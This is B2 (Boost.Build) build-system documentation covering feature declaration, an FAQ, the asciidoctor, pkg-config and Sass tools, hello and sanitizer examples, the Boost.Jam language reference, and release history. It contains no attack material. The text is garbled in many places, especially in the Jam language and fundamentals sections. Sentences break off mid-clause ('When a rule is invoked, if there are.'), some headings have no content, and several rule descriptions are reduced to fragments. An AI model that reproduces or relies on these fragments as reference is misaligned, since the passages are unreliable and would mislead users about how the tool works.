1. Declaring a feature. For that, the "feature.feature" rule is used. You have to decide on the set of feature attributes:
- if you want a feature value set for one target to automatically propagate to its dependent targets, then make it "propagated".
- if a feature does not have a fixed list of values, it must be "free". For example, the include feature is a free feature.
- if a feature is used to refer to a path relative to the Jamfile, it must be a "path" feature.
Such features will also get their values automatically converted to B2's internal path representation. For example, include is a path feature.
- if a feature is used to refer to some target, it must be a "dependency" feature.

2. Representing the feature value in a target-specific variable. Build actions are command templates modified by Boost.Jam variable expansions. The toolset.flags rule sets a target-specific variable to the value of a feature.

3. Using the variable. The variable set in step 2 can be used in a build action to form command parameters or files.

Another example is the DEF_FILE variable used by msvc: its flags declaration tells B2 to translate the internal target name in DEF_FILE to a corresponding filename in the link action. Without it, the expansion of $(DEF_FILE) would be a strange symbol that is not likely to make sense for the linker. We are almost done, except for adding the following code to msvc.jam:

rule link
{
    DEPENDS $(<) : [ on $(<) return $(DEF_FILE) ] ;
}

This is a workaround for a bug in the B2 engine, which will hopefully be fixed one day.

Variants and composite features.

8.7. Main target rules

When a new type is declared, B2 automatically defines a corresponding main target rule. The name of the rule is obtained from the name of the type, by down-casing.

8.8. Toolset modules

There are some conventions that make toolset modules more consistent: the init rule must perform its initialization via the common module. You can take a look at how tools/gcc.jam uses that module in the init rule.

9. Frequently Asked Questions

9.1. How do I get the current value of feature in Jamfile?

This is not possible, since a Jamfile does not have a "current" value of any feature, be it toolset, build variant or anything else. For a single run of B2, any given main target can be built with several different property sets. If you need to behave differently depending on properties, there are two ways:

- Use conditional requirements or indirect conditional requirements. See the section called "Requirements".
- Define a custom generator and a custom main target type. The custom generator can do arbitrary processing of properties. See the extender manual.

9.2. I am getting a "Duplicate name of actual target" error. What does that mean?
The most likely cause is that the same file is being compiled twice with almost the same, but differing, properties. One fix is to factor the file into a separate object target. For example, if you want the include property not to affect how any other sources added for the built a and b executables would be compiled:

obj a-obj : a.cpp : <include>/usr/local/include ;
exe a : a-obj ;
exe b : a-obj ;

Note that in both of these cases the include property will be applied only for building these object files and not any other sources that might be added for targets a and b.

To compile the file twice instead, you can make the object file local to each main target, which tells B2 to actually change the generated object file names a bit for you and thus avoid any conflicts.

A good question is why B2 does not resolve such conflicts automatically; the answer is that silently compiling the file only once when the requested properties differ could produce completely different code than intended.

9.3. Accessing environment variables

Environment variables can be read in a Jamfile with the os.environ rule from the os module.

9.4. How to control properties order?

For internal reasons, B2 sorts all the properties alphabetically, so values of a feature such as include paths may be passed to a tool in a different order than the one in which they were written. When the relative order of values matters, join them with "&&", e.g. <include>a&&b ; values joined this way keep their relative order.

9.5. How to control the library linking order on Unix?

On Unix-like operating systems, the order in which static libraries are specified when invoking the linker is important, because by default the linker makes one pass through the libraries list. Passing the libraries in the incorrect order will lead to a link error. Further, this behavior is often used to make one library override symbols from another. So, sometimes it is necessary to force a specific library linking order. B2 tries to automatically compute the right order: if library a "uses" library b (expressed with the <use> feature), then a will appear on the command line before b.

9.6. Can I get capture external program output using a Boost.Jam variable?

The SHELL builtin rule may be used for this purpose:

local gtk_includes = [ SHELL "gtk-config --cflags" ] ;

9.7. How to get the project root (a.k.a. Jamroot) location?

You might want to use your project's root location in your Jamfiles. To access it, just declare a path constant in your Jamroot.jam file using:

path-constant TOP : . ;

After that, the TOP variable can be used in every Jamfile.

9.8. How to change compilation flags for one file?

If one file must be compiled with special options, explicitly declare an obj target for that file with the desired requirements, and then use that target in your exe or lib declaration.

9.9. Why are the dll-path and hardcode-dll-paths properties useful?

9.10. Targets in site-config.jam

9.11.
Header-only libraries

In B2, a header-only library can be declared as an alias target, and all dependents can use such a library without having to remember its build properties. The dependents need not care whether my-lib is header-only or not, and it is possible to later make my-lib into a regular compiled library without having to add the includes to its dependents' declarations.

If you already have proper usage requirements declared for a project where a header-only library is defined, you do not need to duplicate them for the alias target:

    project my : usage-requirements <include>whatever ;
    alias mylib ;

9.12. What is the difference between B2, b2, bjam and Perforce Jam?

B2 is the name of the complete build system. The executable that runs it is b2. That executable is written in C and implements performance-critical algorithms, like traversal of the dependency graph and executing commands. It also implements an interpreted language used to implement the rest of B2. This executable is formally called the "B2 engine". The B2 engine is derived from an earlier build tool called Perforce Jam. Originally, there were just minor changes, and the filename was bjam. Later on, with more and more changes, the similarity of names became.

10. Extra Tools

10.1. Documentation Tools

10.1.1. Asciidoctor

The asciidoctor tool converts the asciidoc documentation format to various backend formats for either viewing or further processing by documentation tools. This tool supports the baseline asciidoctor distribution (i.e. the Ruby based tool).

Feature: asciidoctor-attribute

Defines arbitrary asciidoctor attributes. The value of the feature should be specified with the CLI syntax for attributes. For example, to use as a target requirement:

    html example : example.adoc : <asciidoctor-attribute>idprefix=ex ;

This is a free feature and is not propagated. I.e. it applies only to the target it's specified on.

Feature: asciidoctor-doctype

Specifies the doctype to use for generating the output format.
Allowed doctype values are: article, book, manpage, and inline.

Feature: asciidoctor-backend

Specifies the backend to use to produce output from the source asciidoc. This feature is automatically applied to fit the build target type. For example, when specifying an html target for an asciidoc source:

    html example : example.adoc ;

The target will by default acquire the <asciidoctor-backend>html5 requirement. The defaults for each target type are:

html: <asciidoctor-backend>html5

docbook: <asciidoctor-backend>docbook45

man: <asciidoctor-backend>manpage

pdf: <asciidoctor-backend>pdf

To override the defaults you specify it as a requirement on the target:

    docbook example : example.adoc : <asciidoctor-backend>docbook5 ;

Allowed backend values are: html5, docbook45, docbook5, manpage, and pdf.

Initialization

To use the asciidoctor tool you need to declare it in a configuration file with the using rule. The initialization takes the following arguments:

command: The command, with any extra arguments, to execute.

For example you could insert the following in your user-config.jam:

    using asciidoctor : "/usr/local/bin/asciidoctor" ;

If no command is given it defaults to just asciidoctor, with the assumption that asciidoctor is available in the search PATH.

10.2. Miscellaneous Tools

10.2.1. pkg-config

The pkg-config program is used to retrieve information about installed libraries in the system. It retrieves information about packages from special metadata files. These files are named after the package, and have a .pc extension. The package name specified to pkg-config is defined to be the name of the metadata file, minus the .pc extension.

Feature: pkg-config

Selects one of the initialized pkg-config configurations. This feature is propagated to dependencies. Its use is discussed in the section Initialization.

Feature: pkg-config-define

This free feature adds a variable assignment to the pkg-config invocation.
For example,

    pkg-config.import mypackage : requirements <pkg-config-define>key=value ;

is equivalent to invoking on the command line

    pkg-config --define-variable=key=value mypackage ;

Rule: import

Main target rule that imports a pkg-config package. When its consumer targets are built, the pkg-config command will be invoked with arguments that depend on the current property set. The features that have an effect are:

<pkg-config-define>: adds a --define-variable argument;

<link>: adds a --static argument when <link>static;

<name>: specifies the package name (the target name is used instead if the property is not present);

<version>: specifies the package version range; it can be used multiple times and should be a dot-separated sequence of numbers optionally prefixed with a comparison operator.

Example:

    pkg-config.import my-package : requirements <name>my_package <version><4 <version>>=3.1 ;

Initialization

To use the pkg-config tool you need to declare it in a configuration file with the using rule:

    using pkg-config : [config] : [command] ... : [ options ] ... ;

config: the name of the initialized configuration. The name can be omitted, in which case the configuration will become the default one.

command: the command, with any extra arguments, to execute. If no command is given, first the PKG_CONFIG environment variable is checked, and if it's empty the string pkg-config is used.

options: options that modify pkg-config behavior. Allowed options are:

<path>: sets the PKG_CONFIG_PATH environment variable; multiple occurrences are allowed.

<libdir>: sets the PKG_CONFIG_LIBDIR environment variable; multiple occurrences are allowed.

<allow-system-cflags>: sets the PKG_CONFIG_ALLOW_SYSTEM_CFLAGS environment variable; multiple occurrences are allowed.

<allow-system-libs>: sets the PKG_CONFIG_ALLOW_SYSTEM_LIBS environment variable; multiple occurrences are allowed.

<sysroot>: sets the PKG_CONFIG_SYSROOT_DIR environment variable; multiple occurrences are allowed.
<variable>: adds a variable definition argument to the command invocation; multiple occurrences are allowed.

Class pkg-config-target

    class pkg-config-target : alias-target-class
    {
        rule construct ( name : sources * : property-set )
        rule version ( property-set )
        rule variable ( name : property-set )
    }

The class of objects returned by the import rule. The objects themselves could be useful in situations that require more complicated logic for consuming a package. See Tips for examples.

rule construct ( name : sources * : property-set )
Overrides alias-target.construct.

rule version ( property-set )
Returns the package's version, in the context of property-set.

rule variable ( name : property-set )
Returns the value of variable name in the package, in the context of property-set.

Tips

Using several configurations

Suppose you have 2 collections of .pc files: one for platform A, and another for platform B. You can initialize 2 configurations of the pkg-config tool, each corresponding to a specific collection:

    using pkg-config : A : : <libdir>path/to/collection/A ;
    using pkg-config : B : : <libdir>path/to/collection/B ;

Then, you can specify that builds for platform A should use configuration A, while builds for B should use configuration B:

    project : requirements <target-os>A-os,<architecture>A-arch:<pkg-config>A
                           <target-os>B-os,<architecture>B-arch:<pkg-config>B ;

Thanks to the fact that the project-config, user-config and site-config modules are parents of the jamroot module, you can put it in any of those files.

Choosing the package name based on the property set

Since a file for a package should be named after the package suffixed with .pc, some projects came up with naming schemes in order to allow simultaneous installation of several major versions or build variants.
In order to pick the specific name corresponding to the build request you can use the <conditional> property in requirements:

    pkg-config.import mypackage : requirements <conditional>@infer-name ;
    rule infer-name ( properties * )
    {
        local name = mypackage ;
        local variant = [ property.select <variant> : $(properties) ] ;
        if $(variant) = debug
        {
            name += -d ;
        }
        return <name>$(name) ;
    }

The common.format-name rule can be very useful in this situation.

Modify usage requirements based on package version or variable

Sometimes you need to apply some logic based on the package's version or a variable that it defines. For that you can use the <conditional> property in usage requirements:

    mypackage = [ pkg-config.import mypackage : usage-requirements <conditional>@extra-props ] ;
    rule extra-props ( properties * )
    {
        local ps = [ property-set.create $(properties) ] ;
        local prefix = [ $(mypackage).variable name_prefix : $(ps) ] ;
        prefix += [ $(mypackage).version $(ps) ] ;
        return <define>$(prefix:J=_) ;
    }

10.2.2. Sass

This tool converts SASS and SCSS files into CSS. This tool explicitly supports both the version written in C (sassc) and the original Ruby implementation (scss), but other variants might also work. In addition to the tool-specific features described in this section, the tool recognizes the features <flags> and <include>.

Feature: sass-style

Sets the output style. Available values are:

nested: each property is put on its own line, rules are indented based on how deeply they are nested;

expanded: each property is put on its own line, rules are not indented;

compact: each rule is put on a single line, nested rules occupy adjacent lines, while groups of unrelated rules are separated by newlines;

compressed: takes the minimum amount of space: all unnecessary whitespace is removed, property values are compressed to have a minimal representation.

The feature is optional and is not propagated to dependent targets.
If no style is specified, then, if property set contains property <optimization>on, compressed style is selected. Otherwise, nested style is selected. Feature: sass-line-numbers Enables emitting comments showing original line numbers for rules. This can be useful for debugging a stylesheet. Available values are on and off. The feature is optional and is not propagated to dependent targets. If no value for this feature is specified, then one is copied from the feature debug-symbols. Initialization To use the sass tool you need to declare it in a configuration file with the using rule. The initialization takes the following arguments: command: the command, with any extra arguments, to execute. For example you could insert the following in your user-config.jam: using sass : /usr/local/bin/psass -p2 ; # Perl libsass-based version If no command is given, sassc is tried, after which scss is tried. 11. Examples 11.1. Introduction Here we include a collection of simple to complex fully working examples of using Boost Build v2 for various tasks. They show the gamut from simple to advanced features. If you find yourself looking at the examples and not finding something you want to see working please post to our support list and we’ll try and come up with a solution and add it here for others to learn from. 11.2. Hello This example shows a very basic Boost Build project set up so it compiles a single executable from a single source file: hello.cpp #include <iostream> int main() { std::cout << "Hello!\n"; } Our jamroot.jam is minimal and only specifies one exe target for the program: jamroot.jam exe hello : hello.cpp ; Building the example yields: > cd /example/hello > b2 ...found 8 targets... ...updating 4 targets... common.mkdir bin/clang-darwin-4.2.1 common.mkdir bin/clang-darwin-4.2.1/debug clang-darwin.compile.c++ bin/clang-darwin-4.2.1/debug/hello.o clang-darwin.link bin/clang-darwin-4.2.1/debug/hello ...updated 4 targets... > bin/clang-darwin-4.2.1/debug/hello Hello! 
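The hello target above can also be given explicit build properties instead of relying on command-line requests. A minimal sketch, using standard B2 features (the property values chosen here are illustrative, not part of the example project):

```jam
# jamroot.jam — request a release build with speed optimization
# directly in the target's requirements.
exe hello : hello.cpp : <variant>release <optimization>speed ;
```

Equivalently, the same properties could be passed on the command line (b2 variant=release optimization=speed) without touching the Jamfile.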
11.3. Sanitizers

This example shows how to enable sanitizers when using a clang or gcc toolset.

main.cpp

    #include <iostream>
    int main() { char* c = nullptr; std::cout << "Hello sanitizers\n " << *c; }

Our jamroot.jam is minimal and only specifies one exe target for the program:

jamroot.jam

    exe main : main.cpp ;

Sanitizers can be enabled by passing on or norecover to the appropriate sanitizer feature (e.g. thread-sanitizer=on). The norecover option causes the program to terminate after the first sanitizer issue is detected. The following example shows how to enable the address and undefined sanitizers in a simple program:

    > cd /example/sanitizers
    > b2 toolset=gcc address-sanitizer=norecover undefined-sanitizer=on
    ...found 10 targets...
    ...updating 7 targets...
    gcc.compile.c++ bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main.o
    gcc.link bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main
    ...updated 7 targets...

Running the produced program may produce output similar to the following:

    > ./bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main
    Hello sanitizers
    main.cpp:6:43: runtime error: load of null pointer of type 'char'
    ASAN:DEADLYSIGNAL
    =================================================================
    ==29767==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55ba7988af1b bp 0x7ffdf3d76560 sp 0x7ffdf3d76530 T0)
    ==29767==The signal is caused by a READ memory access.
    ==29767==Hint: address points to the zero page.
        #0 0x55ba7988af1a in main /home/damian/projects/boost/tools/build/example/sanitizers/main.cpp:6
        #1 0x7f42f2ba1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #2 0x55ba7988adb9 in _start (/home/damian/projects/boost/tools/build/example/sanitizers/bin/gcc-7.3.0/debug/address-sanitizer-norecover/undefined-sanitizer-on/main+0xdb9)
    AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/damian/projects/boost/tools/build/example/sanitizers/main.cpp:6 in main
==29767==ABORTING

12. Boost.Jam Documentation

Jam is a make(1) replacement that makes building simple things simple and building complicated things manageable.

12.1. Building B2

Installing B2 after building it is simply a matter of copying the generated executables someplace in your PATH. For building the executables there are a set of build bootstrap scripts to accommodate particular environments. The scripts take one optional argument, the name of the toolset to build with. When the toolset is not given an attempt is made to detect an available toolset and use that. The build scripts, located in the src/engine directory, accept these arguments.

The build.sh script supports additional invocation options used to control the build and custom compilers:

    build.sh [--option|--option=x] [toolset]

--help
Shows some help information, including these options.

--verbose
Show messages about what this script is doing.

--debug
Builds debugging versions of the executable. The default is to build an optimized executable.

--guess-toolset
Print the toolset we can detect for building. This is used by external scripts, like the Boost Libraries main bootstrap script.

--cxx=CXX
The compiler exec to use instead of the detected compiler exec.

--cxxflags=CXXFLAGS
The compiler flags to use in addition to the flags for the detected compiler.

12.2. Language

B2 has an interpreted, procedural language. Statements in b2 are rule (procedure) definitions, rule invocations, flow-of-control structures, variable assignments, and sundry language support.

12.2.1. Lexical Features

12.2.2. Targets

The essential b2 data entity is a target. Build targets are files to be updated. Source targets are the files used in updating built targets. Built targets and source targets are collectively referred to as file targets, and frequently built targets are source targets for other built targets.
Pseudo-targets). Binding Detection.

12.2.3. Rules

). $(1) and $(2). $(<) and $(>) are synonymous.

Action Modifiers

The following action modifiers are understood:

actions bind vars
$(vars) will be replaced with bound values.

actions existing

actions ignore
The return status of the commands is ignored.

actions piecemeal
commands are repeatedly invoked with a subset of

actions quietly
The action is not echoed to the standard output.

actions together
The actions

updated

Argument lists.

12.2.4. Built-in Rules

B2 has a growing set of built-in rules, all of which are pure procedure rules without updating actions. They are in three groups: the first builds the dependency graph; the second modifies it; and the third are just utility rules.

Dependency Building

DEPENDS

    rule DEPENDS ( targets1 * : targets2 * )

Builds a direct dependency: makes each of targets1 depend on each of targets2. Generally, targets1 will be rebuilt if targets2 are themselves rebuilt or are newer than targets1.

INCLUDES.

Modifying Binding: ALWAYS.

NOTFILE

    rule NOTFILE ( targets * )

Marks targets as pseudo-targets and not real files. No timestamp is checked, and so the actions on such a target are only executed if the target's dependencies are updated, or if the target is also marked with ALWAYS. The default b2 target all is a pseudo-target. In Jambase, NOTFILE is used to define several additional convenient pseudo-targets.

NOUPDATE. TEMPORARY. FAIL_EXPECTED. RMOLD. ISFILE.

Utility

The two rules ECHO and EXIT are utility rules, used only in b2's parsing phase.

EXIT.

GLOB
The GLOB rule does filename globbing.

GLOB_ARCHIVE
The GLOB_ARCHIVE rule does name globbing.

MATCH
The MATCH rule does pattern matching.

    rule MATCH ( regexps + : list * )

Matches the egrep(1) style regular expressions regexps against the strings in list. The result is a list of matching () subexpressions for each string in list, and for each regular expression in regexps.
BACKTRACE

    rule BACKTRACE ( )

Returns a list of quadruples: filename line module rulename…, describing each shallower level of the call stack. This rule can be used to generate useful diagnostic messages from Jam rules.

UPDATE: It clears the list of targets to update, and causes the specified targets to be updated.

W32_GETREG

HKLM is equivalent to HKEY_LOCAL_MACHINE. HKCU is equivalent to HKEY_CURRENT_USER. HKCR is equivalent to HKEY_CLASSES_ROOT.

W32_GETREGNAMES

SHELL.

SPLIT_BY_CHARACTERS

    rule SPLIT_BY_CHARACTERS ( string : delimiters )

SPLIT_BY_CHARACTERS splits the specified string on any delimiter character present in delimiters and returns the resulting list.

PRECIOUS

    rule PRECIOUS ( targets * )

The PRECIOUS rule specifies that each of the targets passed as the arguments should not be removed even if the command updating that target fails.

PAD

    rule PAD ( string : width )

If string is shorter than width characters, pads it with whitespace characters on the right, and returns the result. Otherwise, returns string unmodified.

FILE_OPEN

    rule FILE_OPEN ( filename : mode )

The FILE_OPEN rule opens the specified file and returns a file descriptor. The mode parameter can be either "w" or "r". Note that at present, only the UPDATE_NOW rule can use the resulting file descriptor number.

UPDATE_NOW.

12.2.5. Flow-of-Control

12.2.6. Variables

Variable Expansion

:B
Select a basename without extension.

:S
Select file extension.

:W
A modifier that, under Cygwin only, turns a Cygwin path into a Win32 path using the cygwin_conv_to_win32_path function. For example

    x = "/cygdrive/c/Program Files/Borland" ; ECHO $(x:W) ;

prints C:\Program Files\Borland on Cygwin.

Similarly, when used on OpenVMS, the :W modifier translates a POSIX-style path into native VMS-style format using the decc$to_vms CRTL function. This modifier is generally used inside action blocks to properly specify file paths in VMS-specific commands.
For example

    x = "subdir/filename.c" ; ECHO $(x:W) ;

prints [.subdir]filename.c on OpenVMS. On other platforms, the string is unchanged.

:chars
Select the components listed in chars. For example, :BS selects filename (basename and extension).

:J=joinval
Concatenate list elements into a single element, separated by joinval.

:O=value
Sets semantic options for the evaluation of the variable. The format of the value is specific to either variable or generated file expansion.

On VMS, $(var:P) is the parent directory of $(var:D).

:<=value
After evaluating the expansion of the variable, prefixes the given value to the elements of the expanded expression values.

:>=value
After evaluating the expansion of the variable, postfixes the given value to the elements of the expanded expression values.

Local For Loop Variables

Boost Jam allows you to declare a local for loop control variable right in the loop:

    x = 1 2 3 ;
    y = 4 5 6 ;
    for local y in $(x)
    {
        ECHO $(y) ; # prints "1", "2", or "3"
    }
    ECHO $(y) ; # prints "4 5 6"

Generated File Expansion

This expansion follows the same modifiers as variable expansion. The generated file expansion accepts these ( :O= ) expansion option values:

F
Always replace the reference with the filename.

C
Always replace the reference with the contents ( :E=value expression ).

FC or CF
Replace with either the file or contents depending on the length of the contents ( :E=value ). It will replace with the contents in an action if the length of the command is shorter than the allowed command length limit. Otherwise the reference is replaced with the filename.

Built-in Variables

This section discusses variables that have special meaning to b2. All of these must be defined or used in the global module — using those variables inside a named module will not have the desired effect. See Modules.

SEARCH and LOCATE

If $(LOCATE) is set then the target is bound relative to the first directory in $(LOCATE). Only the first element is used for binding.
If $(SEARCH) is set then the target is bound to the first directory in $(SEARCH) where the target file already exists.

Semaphores

It is sometimes desirable to disallow parallel execution of some actions. For example:

Old versions of yacc use files with fixed names. So, running two yacc actions is dangerous.

One might want to perform parallel compiling, but not do parallel linking, because linking is i/o bound and only gets slower.

Jam Version

JAMDATE
Time and date at b2 start-up as an ISO-8601 UTC value.

JAMUNAME
Output of the uname(1) command (Unix only).

JAMVERSION
The b2 version, as a semantic triplet "X.Y.Z".

JAM_VERSION
A predefined global variable with two elements that indicates the version number of Boost Jam. Boost Jam versions start at 03 00. Earlier versions of Jam do not automatically define JAM_VERSION.

JAMSHELL
It expands a % to be the text of the rule's action block, and a ! to be the multi-process slot number. The slot number varies between 1 and the number of concurrent jobs permitted by the -j flag given on the command line. Armed with this, it is possible to write a multiple host shell.

#!

__TIMING_RULE__ and __ACTION_RULE__

12.2.7. Modules

Declaration

Variable Scope Rules

local rule rulename...

The rule is declared locally to the current module. It is not entered in the global module with qualification, and its name will not appear in the result of:

    [ RULENAMES module-name ]

The RULENAMES Rule

    rule RULENAMES ( module ? )

Returns a list of the names of all non-local rules in the given module. If module is omitted, the names of all non-local rules in the global module are returned.

The VARNAMES Rule

    rule VARNAMES ( module ? )

Returns a list of the names of all variable bindings in the given module. If module is omitted, the names of all variable bindings in the global module are returned.

The IMPORT Rule

The EXPORT Rule

The CALLER_MODULE Rule

12.3. Miscellaneous

12.3.1.
Diagnostics

In addition to generic error messages, b2 may report that it removed a partially built target after being interrupted.

12.3.2. Bugs, Limitations.

12.3.3. Fundamentals

Jam rules are actually simple procedural entities. Think of them as functions. Arguments are separated by colons.

A Jam target is an abstract entity identified by an arbitrary string. The built-in DEPENDS rule creates a link in the dependency graph between the named targets. Note that the original Jam documentation for the built-in.

When a rule is invoked, if there are.

Targets (other than.

In addition to local and global variables, jam allows you to set a variable on a target. Target-specific variable values can usually not be read, and take effect only in the following contexts:

In updating actions, variable values are first looked up on the target named by the first argument (the target being updated). Because Jam builds its entire dependency tree before executing actions, Jam rules make target-specific variable settings as a way of supplying parameters to the corresponding actions.

Binding is controlled entirely by the target-specific setting of the SEARCH and LOCATE variables, as described here.

In the special rule used for header file scanning, variable values are first looked up on the target named by the rule's first argument (the source file being scanned).

The "bound value" of a variable is the path associated with the target named by the variable. In build actions, the first two arguments are automatically replaced with their bound values. Target-specific variables can be selectively replaced by their bound values using the bind action modifier.

"Grist" is just a string prefix of the form <characters>. It is used in Jam to create unique target names based on simpler names. For example, the file name test.exe may be used by targets in separate sub-projects: the location of targets cannot always be derived solely from what the user puts in a Jamfile, but sometimes depends also on the binding process.
Some mechanism to distinctly identify targets with the same name is still needed. Grist allows us to use a uniform abstract identifier for each built target, regardless of target file location (as allowed by setting ALL_LOCATE_TARGET).

When grist is extracted from a name with $(var:G), the result includes the leading and trailing angle brackets. When grist is added to a name with $(var:G=expr), existing grist is first stripped. Then, if expr is non-empty, leading <s and trailing >s are added if necessary to form an expression of the form <expr2>; <expr2> is then prepended.

The parsing of command line options in Jam can be rather unintuitive, with regards to how other Unix programs accept options. There are two variants accepted as valid for an option: -xvalue, and -x value.

13. History

13.1. Version 4.7.2

Fix errors configuring intel-linux toolset if icpx is not in the PATH but icpc is in the PATH.
— Mark E. Hamilton

13.2. Version 4.7.1

Add cxxstd=20 to msvc toolset now that VS 2019 onward supports it.
— Peter Dimov

13.3. Version 4.7.0

Many, many fixes and internal cleanups in this release. But also adding auto-detection and bootstrap for VS 2022 preview toolset.

New: Add vc143, aka VS2022, aka cl.exe 17.x toolset support. Includes building engine and automatic detection of the prerelease toolset.
— Sergei Krivonos

Allow alias targets to continue even if <build>no is in the usage requirements. Which allows composition of alias targets that may contain optional targets, like tests.
— Dmitry Arkhipov

Fix use of JAMSHELL in gcc toolset.
— René Ferdinand Rivera Morell

Fix compiling the b2 engine such that it works when run in a cross-architecture emulation context. I.e. when running arm binaries in a QEMU 64 bit host.
— René Ferdinand Rivera Morell

Default to 64bit MSVC on 64 bit hosts.
— Matt Chambers

Remove /NOENTRY option for resource-only DLLs to allow correct linking.
— gnaggnoyil

Fix redefinition error of unix when compiling engine on OpenBSD.
— Brad Smith

Fix building with clang on iOS and AppleTV having extra unrecognized compiler options.
— Konstantin Ivlev

Add missing Boost.JSON to boost support module.
— Dmitry Arkhipov

Add arm/arm64 target support in clang-win toolset.
— Volo Zyko

Avoid warnings about threading model for qt5.
— psandana

Unify Clang and GCC PCH creation.
— Nikita Kniazev

Move Objective-C support to GCC toolset.
— Nikita Kniazev

Support values for instruction-set feature for Xilinx ZYNQ.
— Thomas Brown

MIPS: add generic mips architecture.
— YunQiang Su

Fix preprocessing on MSVC compiler.
— Nikita Kniazev

13.4. Version 4.6.1

Fix building b2 engine with cygwin64.
— René Ferdinand Rivera Morell

Fix version detection of clang toolset from compiler exec.
— Nikita Kniazev

13.5. Version 4.6.0

This release wraps up a few new features that make using some toolsets easier (thanks to Nikita). It's now also possible to specify empty flags features on the command line, like cxxflags=, and have those be ignored. This helps to make CI scripts shorter as they don't need to handle those cases specially. And as usual there are many bug fixes and adjustments. Thanks to everyone who contributed to this release.

New: Allow clang toolset to be auto-configured to a specific version by using toolset=clang-xx on the command line.
— Nikita Kniazev

New: Include pch header automatically and on-demand on gcc and msvc toolsets to mirror clang functionality.
— Nikita Kniazev

New: Features that are marked as 'free' and 'optional' will now be ignored when the value specified on the command line is empty. Hence one can specify cxxflags= on the command line without errors.
— René Ferdinand Rivera Morell

Preserve bootstrap.sh invoke arguments to forward to the build.sh script.
— tkoecker

Remove use of local in build.sh to be compatible with some, not fully capable, shells.
— Tanzinul Islam

Workaround shell array ref error in build.sh on busybox shells.
— tkoecker

Check for needing -pthread to build engine with gcc on some platforms.
— tkoecker

Default to using clang on MacOS.
— Stéphan Kochen

Add /python//numpy target to use as a dependency to communicate version specific properties.
— Peter Dimov

Add default value for cxx and cxxflags from env vars CXX and CXXFLAGS when using the custom cxx toolset to build the engine.
— Samuel Debionne and René Ferdinand Rivera Morell

Fix detection of intel-linux toolset installation when only the compiler executable is in the PATH.
— René Ferdinand Rivera Morell

Fix b2 executable path determination for platforms that don't have a native method of getting the path to executables, like OpenBSD.
— René Ferdinand Rivera Morell

Fix property.find error message.
— Thomas Brown

13.6. Version 4.5.0

Some minor fixes to improve some old issues.

Reenable ability of generators to return property-set as first item.
— Andrew McCann

Fix examples to return 0 on success.
— Mateusz Łoskot

Handle spaces in CXX path in config_toolset.bat.

Fix Conan b2 generator link, and pkg-config doc build error.
— René Ferdinand Rivera Morell

13.7. Version 4.4.2

This release is the first of the new home for B2 at Build Frameworks Group.

Change references in documentation and sources of boost.org to point at equivalent bfgroup resources.
— René Ferdinand Rivera Morell

New theme for B2 site and documentation.
— René Ferdinand Rivera Morell

13.8. Version 4.4.1

Minor patch to correct missing fix for macOS default engine compiler.

Fix engine build defaulting to gcc instead of clang on macOS/Xcode.
— René Ferdinand Rivera Morell

13.9. Version 4.4.0

Along with a variety of fixes this version introduces "dynamic" response file support for some toolsets. This means that under most circumstances, if supported by the toolset, response files are not generated. Instead the command is expanded to include the options directly.

New: Add response-file feature to control the kind of response file usage in toolset actions.
— René Ferdinand Rivera Morell

New: Add :O=value variable modifier for
New: Add :<=value and :>=value variable modifiers for prefix and postfix values after the complete expansion of variable references.
— René Ferdinand Rivera Morell

New: Implement PCH on clang-win and clang-darwin.
— Nikita Kniazev

New: Add support for Intel oneAPI release to intel-linux toolset.
— René Ferdinand Rivera Morell

New: Add support for Intel oneAPI release to intel-windows toolset.
— Edward Diener

Remove one-at-a-time linking limit. Once upon a time this was a performance tweak as hardware and software was not up to doing multiple links at once. Common setups are better equipped.
— René Ferdinand Rivera Morell

Fix building engine with GCC on AIX.
— René Ferdinand Rivera Morell

Support building engine as either 32 or 64 bit addressing model.
— René Ferdinand Rivera Morell

Basic support for building b2 engine on GNU/Hurd.
— Pino Toscano

Update "borland" toolset to bcc32c for building B2.
— Tanzinul Islam

Ensure Embarcadero toolset name is only "embtc".
— Tanzinul Islam

Adapt for Emscripten 2.0 change of default behavior for archives.
— Basil Fierz

Fix path to bootstrap for back compat.
— René Ferdinand Rivera Morell

Add missing BOOST_ROOT to bootstrap search.
— René Ferdinand Rivera Morell

Fix for engine compile on FreeBSD.
— René Ferdinand Rivera Morell

Default MSVC to a native platform, and remove ambiguous implicit address-model ARM/ARM64 values.
— Nikita Kniazev

Fix detection of MIPS32 for b2 engine build.
— Ivan Melnikov

Enable building b2 engine with clang on Windows.
— Gei0r

Fix building b2 engine with Intel Linux icpc.
— Alain Miniussi

Rework build.sh to fix many bugs and to avoid use of common env vars.
— René Ferdinand Rivera Morell

Remove limitation of relevant features for configure checks.
— René Ferdinand Rivera Morell

Reformat configure check output to inform the variants of the checks in a reasonably brief form.
— René Ferdinand Rivera Morell
- Support building engine on Windows Bash with Mingw. — René Ferdinand Rivera Morell

13.10. Version 4.3.0

There are many individual fixes in this release. Many thanks for the contributions. Special thanks to Nikita for the many improvements to msvc and general plugging of support holes in all the compilers. There are some notable new features from Dmitry, Edward, and Nikita:
- New: Add force-include feature to include headers before all sources. — Nikita Kniazev
- New: Partial support for Embarcadero C++ compilers based on clang-5. — Edward Diener
- New: Implement configurable installation prefixes that use features. — Dmitry Arkhipov
- New: Add translate-path feature. The translate-path feature allows for custom path handling, with a provided rule, on a per target basis. This can be used to support custom path syntax. — René Ferdinand Rivera Morell
- New: Add portable B2 system install option. This allows the b2 executable and the build system files to live side by side. And hence to be (re)located anywhere on disk. Soon to be used to support Windows and other installers. This removes the need for the boost-build.jam file for bootstrap. Making it easier for users to get started. — René Ferdinand Rivera Morell
- Unbreak building from VS Preview command prompt. — Marcel Raad
- Fix compiler version check on macOS darwin toolset. — Bo Anderson
- Remove pch target naming restriction on GCC. — Nikita Kniazev
- Select appropriate QNX target platform. — Alexander Karzhenkov
- Various space & performance improvements to the b2 engine build on Windows. — Nikita Kniazev
- Fill extra and pedantic warning options for every compiler. — Nikita Kniazev
- Include OS error reason for engine IO failures. — Nikita Kniazev
- Use /Zc:inline and /Zc:throwingNew flags for better language conformance. — Nikita Kniazev
- Add cxxstd value 20 for C++20. — Andrey Semashev
- Parallel B2 engine compilation on MSVC. — Nikita Kniazev
- Updated instruction-set feature with new x86 targets.
— Andrey Semashev
